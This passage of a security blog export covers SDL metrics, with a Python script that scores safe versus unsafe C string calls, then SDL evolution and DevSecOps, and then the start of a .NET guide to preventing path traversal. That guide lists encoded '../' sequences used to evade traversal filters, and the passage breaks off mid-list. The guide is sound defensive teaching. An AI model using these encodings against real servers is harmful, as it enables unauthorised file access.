From Wikipedia, GDPR: <a class="markup--anchor markup--blockquote-anchor" data-href="https://en.wikipedia.org/wiki/General_Data_Protection_Regulation" href="https://en.wikipedia.org/wiki/General_Data_Protection_Regulation" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">“Controllers of personal data must put in place <span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;">appropriate technical and organisational measures</span> to implement the data protection principles</a>”</blockquote>
<div class="graf graf--p graf-after--blockquote" id="83fe" name="83fe" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
With that in mind, it doesn’t take long to forecast that an enterprise investing in security principles and a <em class="markup--em markup--p-em" style="font-feature-settings: "liga", "salt";">substantial</em> SDL will have a <span class="markup--strong markup--p-strong" style="font-weight: 700;">double advantage</span>: the original, primordial one, a <span class="markup--strong markup--p-strong" style="font-weight: 700;">more secure product</span> (e.g. Microsoft in 2002), but also the newer one that comes from <span class="markup--strong markup--p-strong" style="font-weight: 700;">visibility,</span> which customers demand more and more.</div>
<div class="graf graf--p graf-after--p" id="9d35" name="9d35" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
SDL was a means to a more secure product; today it is becoming even more than that: a company “value” and something in the realm of morality and ethics, not so different from environmental sustainability. Also, the earlier a company sits in the supply chain (hardware, operating system, authentication server, payment gateway, development frameworks), the more it should care, because the damage it can do to the information technology environment is the greatest. Recent years’ Spectre, Heartbleed, <a class="markup--anchor markup--p-anchor" data-href="https://en.wikipedia.org/wiki/EternalBlue" href="https://en.wikipedia.org/wiki/EternalBlue" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">EternalBlue</a>, BIOS and <a class="markup--anchor markup--p-anchor" data-href="https://www.theverge.com/2019/3/25/18280716/asus-update-tool-hacked-shadowhammer-malware" href="https://www.theverge.com/2019/3/25/18280716/asus-update-tool-hacked-shadowhammer-malware" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">software update security</a> incidents are just a few examples of pollution of the supply chain.</div>
<div class="graf graf--p graf-after--p" id="97d3" name="97d3" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Metrics transformation: lead vs lag indicators</span></div>
<div class="graf graf--p graf-after--p" id="e116" name="e116" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
Take this example of metrics:</div>
<blockquote class="graf graf--blockquote graf--startsWithDoubleQuote graf-after--p" id="8656" name="8656" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 29px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
<span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;">“the percentage of people wearing hard hats on a building site is a </span><span class="markup--strong markup--blockquote-strong" style="font-weight: 700;"><span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;">leading safety indicator</span></span><span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;">. A lagging indicator is an output measurement, for example; the</span><span class="markup--strong markup--blockquote-strong" style="font-weight: 700;"><span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;"> number of accidents</span></span><span class="markup--em markup--blockquote-em" style="font-feature-settings: "liga", "salt"; font-style: normal;"> on a building site is a lagging safety indicator.”</span></blockquote>
<blockquote class="graf graf--blockquote graf-after--blockquote" id="6b64" name="6b64" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 0px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px; padding-top: 27px;">
From: <a class="markup--anchor markup--blockquote-anchor" data-href="https://www.intrafocus.com/lead-and-lag-indicators/" href="https://www.intrafocus.com/lead-and-lag-indicators/" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">https://www.intrafocus.com/lead-and-lag-indicators/</a></blockquote>
<div class="graf graf--p graf-after--blockquote" id="3137" name="3137" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
As secure development practices evolve, the same should happen to the related metrics. Formal compliance frameworks and the absence of severe incidents may have been enough in the past, but neither is observed before software development itself. Leading indicators, on the other hand, are measured <span class="markup--strong markup--p-strong" style="font-weight: 700;">during the SDL</span>; leading effort can be measured both in resource expenditure and in assessed maturity level, and ideally in both.</div>
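The kind of leading indicator this section argues for, applied to the secure-coding check quoted from the HCSEC report above (use of memcpy()-like, strcpy()-like and sprintf()-like functions in their safe and unsafe variants): the script below, an added example that is not part of the original post or of any vendor's tooling, counts tracked calls in C source and turns them into a safe-variant share that can be measured during the SDL and gated in a build. Which bounded variants count as "safe", the threshold, and the sample C source are all assumptions made for the example.

```python
import re
from collections import Counter

# Families named in the HCSEC excerpt ("memcpy()-like, strcpy()-like and
# sprintf()-like functions in their safe and unsafe variants"). Which bounded
# variant counts as "safe" is an assumption for this example, not a quotation
# of any vendor's coding guideline.
UNSAFE_VARIANTS = {
    "memcpy": ("memcpy_s",),
    "strcpy": ("strncpy", "strcpy_s", "strlcpy"),
    "strcat": ("strncat", "strcat_s", "strlcat"),
    "sprintf": ("snprintf", "sprintf_s"),
    "vsprintf": ("vsnprintf", "vsprintf_s"),
}
SAFE_TO_FAMILY = {safe: unsafe
                  for unsafe, safes in UNSAFE_VARIANTS.items() for safe in safes}

# Comments and string/char literals are blanked first so that "strcpy(" inside
# a comment or a format string is not counted as a call.
_COMMENT_OR_LITERAL = re.compile(
    r'/\*.*?\*/|//[^\n]*|"(?:\\.|[^"\\\n])*"|\'(?:\\.|[^\'\\\n])*\'', re.DOTALL)
# An identifier immediately followed by "(": the whole identifier is consumed,
# so memcpy_s( is never mistaken for memcpy(.
_CALL = re.compile(r'\b([A-Za-z_]\w*)\s*\(')


def count_memory_calls(source: str) -> Counter:
    """Count calls to the tracked unsafe and safe variants in one C source text."""
    code = _COMMENT_OR_LITERAL.sub(" ", source)
    counts = Counter()
    for name in _CALL.findall(code):
        if name in UNSAFE_VARIANTS or name in SAFE_TO_FAMILY:
            counts[name] += 1
    return counts


def adherence_metric(counts: Counter) -> dict:
    """Leading indicator: share of safe variants among tracked calls, per family and overall."""
    families = {}
    total_safe = total_unsafe = 0
    for unsafe, safes in UNSAFE_VARIANTS.items():
        n_unsafe = counts[unsafe]
        n_safe = sum(counts[s] for s in safes)
        total_unsafe += n_unsafe
        total_safe += n_safe
        if n_unsafe + n_safe:
            families[unsafe] = {
                "unsafe": n_unsafe,
                "safe": n_safe,
                "safe_share": n_safe / (n_unsafe + n_safe),
            }
    total = total_safe + total_unsafe
    return {
        "families": families,
        "unsafe_calls": total_unsafe,
        "safe_calls": total_safe,
        # A code base with no tracked calls at all trivially adheres.
        "safe_share": total_safe / total if total else 1.0,
    }


def passes_gate(metric: dict, min_safe_share: float) -> bool:
    """SDL build gate: True when the safe share meets the threshold the team set."""
    return metric["safe_share"] >= min_safe_share


# Constructed sample source for the demonstration (not real vendor code).
SAMPLE_C = r"""
#include <stdio.h>
#include <string.h>

/* legacy note: strcpy(dst, src) inside a comment must not be counted */
static void legacy(char *dst, const char *src) {
    strcpy(dst, src);                      /* unsafe variant */
    sprintf(dst, "%s", src);               /* unsafe variant */
    printf("memcpy(\"x\") in a literal");  /* literal, must not be counted */
}

static void hardened(char *dst, size_t n, const char *src) {
    strncpy(dst, src, n - 1);              /* bounded variant */
    dst[n - 1] = '\0';
    snprintf(dst, n, "%s", src);           /* bounded variant */
    memcpy_s(dst, n, src, strlen(src));
}
"""

if __name__ == "__main__":
    metric = adherence_metric(count_memory_calls(SAMPLE_C))
    print(metric)                          # safe_share is 0.6 for the sample above
    print("gate(0.9):", passes_gate(metric, 0.9))
```

Run over a whole tree and recorded per build, the safe share gives a trend line that moves before any incident does, which is exactly what distinguishes it from the lagging indicators discussed above.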
<div class="graf graf--p graf-after--p" id="0790" name="0790" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
After all, would you trust a nuclear power plant just because it is compliant with the law and had no incidents in the last 10 years, even IF it doesn’t spend a buck on security? Let’s put it this way: our planes and power plants run a lot of software, as will our future surgical machines, human-driven and self-driving cars, etc… and I want to see organizations passionately investing in security, in the smartest and most efficient way, please!</div>
<div class="graf graf--p graf-after--p graf--trailing" id="af0e" name="af0e" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
In the next part(s) I want to dig deeper into the evolution of SDL practices in the cyber security market.</div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-48461242952503053272019-04-11T01:49:00.000-07:002019-05-18T03:16:10.108-07:00Secure Development Lifecycle: the SDL value evolution. Part 2<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="graf graf--p graf-after--h3" id="a870" name="a870" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 8px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Evolution of SDL practices: from custom to product to service</span></div>
<div class="graf graf--p graf-after--p" id="ad9b" name="ad9b" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
The increasing visibility trend discussed in Part 1 is, of course, affecting current cybersecurity practices in terms of their evolution and maturity, also toward a “service”.</div>
<blockquote class="graf graf--blockquote graf-after--p" id="fc09" name="fc09" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; border-left: 3px solid rgba(0, 0, 0, 0.84); color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; font-style: italic; letter-spacing: -0.003em; line-height: 1.58; margin: 29px 0px 0px -23px; padding-bottom: 2px; padding-left: 20px;">
<a class="markup--anchor markup--blockquote-anchor" data-href="https://medium.com/wardleymaps/exploring-the-map-ad0266fad59b" href="https://medium.com/wardleymaps/exploring-the-map-ad0266fad59b" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">Organisations consist of value chains that are comprised of components that are evolving from genesis to more of a commodity. It sounds fairly basic stuff but it has profound effects because that journey of evolution involves changing characteristics.</a></blockquote>
<div class="graf graf--p graf-after--blockquote" id="2efb" name="2efb" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
The following is a <a class="markup--anchor markup--p-anchor" data-href="https://medium.com/@swardley" href="https://medium.com/@swardley" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">Wardley Map</a> (a product evolution/visibility graph) comparing Penetration Testing (PT, more of a reactive activity) with SDL (preventing vulnerabilities):</div>
<br />
<br />
<figure class="graf graf--figure graf-after--p" id="72cb" name="72cb" style="background-color: white; box-sizing: border-box; clear: both; color: rgba(0, 0, 0, 0.84); font-family: medium-content-sans-serif-font, -apple-system, system-ui, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; font-size: 20px; margin: 43px 0px 0px; outline: 0px; position: relative; user-select: auto; z-index: 100;"><img src="https://cdn-images-1.medium.com/max/1600/0*GIFW1hlDfbuTItl2" width="913" height="594" style="display: block; margin: auto; max-width: 100%;" />
</figure><br />
<div class="graf graf--p graf-after--figure" id="85a1" name="85a1" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 38px;">
The previous example is a comparison over time (call it 10 years) of one of the most common practices in cybersecurity. Penetration Testing (PT) went from a custom-made exercise to a product and is shifting to a commodity (PT as a service, crowd-sourced bug bounties, etc…), whereas the ‘Prevent’ activity, SDL, is taking the shape of a product and finally gaining more visibility, which, by the way, means money.</div>
<div class="graf graf--p graf-after--p" id="d823" name="d823" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Pushing security left in the lifecycle, but also pushing up in visibility</span></div>
<br />
<br />
<figure class="graf graf--figure graf-after--p" id="47ae" name="47ae" style="background-color: white; box-sizing: border-box; clear: both; color: rgba(0, 0, 0, 0.84); font-family: medium-content-sans-serif-font, -apple-system, system-ui, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif; font-size: 20px; margin: 43px 0px 0px; outline: 0px; position: relative; user-select: auto; z-index: 100;"><img src="https://cdn-images-1.medium.com/max/1600/1*lapqUFdkczOjDBZpOm36sQ.png" width="1039" height="202" style="display: block; margin: auto; max-width: 100%;" />
<figcaption class="imageCaption" style="--baseline-multiplier: 0.22; --x-height-multiplier: 0.342; color: rgba(0, 0, 0, 0.68); font-family: medium-content-sans-serif-font, "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Geneva, Arial, sans-serif; font-feature-settings: "liga", "lnum"; font-size: 16px; left: 0px; letter-spacing: 0px; line-height: 1.4; margin-top: 10px; outline: 0px; position: relative; text-align: center; top: 0px; width: 700px; z-index: 300;">from: <a class="markup--anchor markup--figure-anchor" data-href="https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95" href="https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95</a></figcaption></figure><br />
<div class="graf graf--p graf-after--figure" id="6d40" name="6d40" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 38px;">
The <a class="markup--anchor markup--p-anchor" data-href="https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95" href="https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">Pushing left like a Boss</a> series explains very well how to prevent better; the map of the SDL’s evolution also shows the point discussed in Part 1 of this article: the visibility value of having an SDL.</div>
<div class="graf graf--p graf-after--p" id="a1b3" name="a1b3" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
The birth of a new vocabulary is the result (for some, the cause) of this “pushing left”. DevSecOps is the term now used to express this fact; “Threat Model” is another term gaining traction.</div>
<div class="graf graf--p graf-after--p" id="783d" name="783d" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
DevSecOps implies that the “security guys” will work together with the developers, and also that developers will be more involved in security practices. I think this is a real advance in the SDL field. Of course, vendors will overload the term with fancy product associations; that is always to be expected… we know that Dev*Ops is a principle/value more than a bunch of products.</div>
<div class="graf graf--p graf-after--p" id="8d66" name="8d66" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
By contrast, PenTest (black-box testing, often disconnected from the SDL, non-automated, a single point-in-time activity; <a class="markup--anchor markup--p-anchor" data-href="https://www.owasp.org/images/a/a6/MWR_-_OWASP_v6.pdf" href="https://www.owasp.org/images/a/a6/MWR_-_OWASP_v6.pdf" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">link</a>) will have a hard time in the near future in an educated SDL environment. Will rules-based compliance follow this trend soon? I don’t know the answer. But if you think you need a PenTest… most likely you need to mature your SDL even more!</div>
<div class="graf graf--p graf-after--p" id="6e1f" name="6e1f" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
<span class="markup--strong markup--p-strong" style="font-weight: 700;">Security says yes!</span></div>
<div class="graf graf--p graf-after--p graf--trailing" id="88ca" name="88ca" style="--baseline-multiplier: 0.17; --x-height-multiplier: 0.375; background-color: white; color: rgba(0, 0, 0, 0.84); font-family: medium-content-serif-font, Georgia, Cambria, "Times New Roman", Times, serif; font-size: 21px; letter-spacing: -0.003em; line-height: 1.58; margin-top: 29px;">
DevSecOps values push toward software evolution (CD: continuous delivery of new features), automation and quality (continuous integration). It is fertile ground for increasing the maturity of the SDL. Investing in the SDL also means more functional products in the short/medium term, not only more secure and less risky ones. Of course, the challenge is to transform a legacy product/team to this more integrated approach. Intrinsic problems like the lack of specific expertise in the market are still plaguing the cybersecurity and SDL sector. It is also something that cannot be implemented in a “few weeks”. Defining a custom plan, also called a programme or roadmap, based on maturity models like OWASP <a class="markup--anchor markup--p-anchor" data-href="https://github.com/OWASP/samm/raw/master/Supporting%20Resources/v1.5/Final/SAMM_Quick_Start_V1-5_FINAL.pdf" href="https://github.com/OWASP/samm/raw/master/Supporting%20Resources/v1.5/Final/SAMM_Quick_Start_V1-5_FINAL.pdf" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">SAMM</a> and <a class="markup--anchor markup--p-anchor" data-href="https://www.owasp.org/index.php/OWASP_Software_Security_5D_Framework" href="https://www.owasp.org/index.php/OWASP_Software_Security_5D_Framework" rel="nofollow noopener" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0.54); background-color: transparent; background-image: url("data:image/svg+xml; background-position: 0px calc(1em + 1px); background-repeat: repeat-x; background-size: 1px 1px; http: //www.w3.org/2000/svg\"><line x1=\"0\" y1=\"0\" x2=\"1\" y2=\"1\" stroke=\"currentColor\" /></svg>"); text-decoration-line: none;" target="_blank">OWASP 5D</a>, made up of incremental enhancements over time, has been successful in several organizations. It may take years but there are not many shortcuts.</div>
</div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-72855527345628137712018-10-23T02:18:00.000-07:002019-12-06T07:19:33.328-08:00How to prevent Path Traversal in .NET<h3>
Introduction</h3>
<div>
<div style="text-align: justify;">
A well-known, never out of fashion and high-impact vulnerability is Path Traversal. This technique is also known as a <i>dot-dot-slash attack</i> (../) or <i>directory traversal</i>, and it consists in exploiting insufficient validation/sanitization of user input that the application uses to build pathnames for retrieving files or directories from the file system, by manipulating the values with special characters that allow access to parent directories.<br />
In Open Web Application Security Project (OWASP) terms, a path traversal attack falls under category <a href="https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control">A5 of the Top 10 (2017)</a>: Broken Access Control, so, as one of the top 10 issues of 2017, we should give it special attention.<br />
<br /></div>
</div>
<h3>
Theoretical Concept</h3>
<div>
<div>
<div style="text-align: justify;">
Most basic Path Traversal attacks are made through the "../" character sequence, used to alter the resource location requested from a URL. Although many web servers protect applications against escaping from the web root, different encodings of the "../" sequence can be used to bypass these filters, exploiting flawed canonicalization and normalization steps. </div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<b>URL Encode :</b></div>
<ul>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%2e%2e%2f</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">../</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%2e%2e/</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">../</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..%2f</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">../</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%2e%2e%5c</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..\</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..%255c</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..\</span></li>
<li><span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..%u2216</span> which translates to <span style="background: #eee; border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..\</span></li>
</ul>
<div>
<b>Valid Unicode / UTF-8 Encodings :</b></div>
<div>
<ul>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%cc%b7</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> ̷ </span> (U+0337, NON-SPACING SHORT SLASH OVERLAY)</li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%cc%b8</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> ̸ </span> (U+0338, NON-SPACING LONG SLASH OVERLAY)</li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%e2%81%84</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> ⁄ </span> (U+2044, FRACTION SLASH)</li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%e2%88%95</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> ∕ </span> (U+2215, DIVISION SLASH)</li>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%ef%bc%8f</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> ／ </span> (U+FF0F, FULLWIDTH SLASH)</li>
</ul>
</div>
</div>
<div>
<b>Invalid Unicode / UTF-8 Encodings :</b></div>
<div>
<ul>
<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%c1%1c</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">/</span></li>
